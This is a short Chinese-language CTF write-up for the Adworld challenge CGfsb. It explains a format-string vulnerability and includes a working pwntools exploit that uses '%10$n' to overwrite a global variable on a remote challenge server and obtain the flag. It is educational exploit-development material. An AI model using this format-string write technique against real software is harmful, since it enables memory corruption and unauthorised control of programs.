其他分享
首页 > 其他分享> > 攻防世界(6):CGfsb

攻防世界(6):CGfsb

作者:互联网

查壳,Pie没开,但开了canary和NX,无法直接覆盖返回地址或使用shellcode

逛该ida 发现pwnme是拿到flag的关键

利用printf(%s)的特性可以泄露偏移地址

可以看这个博客学习格式化字符漏洞

得到偏移量为10(数一数)41414141是第几个出现的

编写exp,利用%n修改pwnme的值,由于p32(addr_pwnme)占4个字节,让其==8,再填充4个字节

#!/usr/bin/env python
from pwn import *
p = remote('111.200.241.244', 45138)
addr_pwnme = 0x0804A068 
p.recvuntil("please tell me your name:\n")
p.sendline('123')
payload = p32(addr_pwnme) + 'aaaa' + '%10$n' 
p.recvuntil("leave your message please:\n")
p.sendline(payload)
p.interactive()

标签:攻防,CGfsb,addr,世界,please,payload,pwnme,recvuntil,your
来源: https://www.cnblogs.com/triplewings-home/p/14452334.html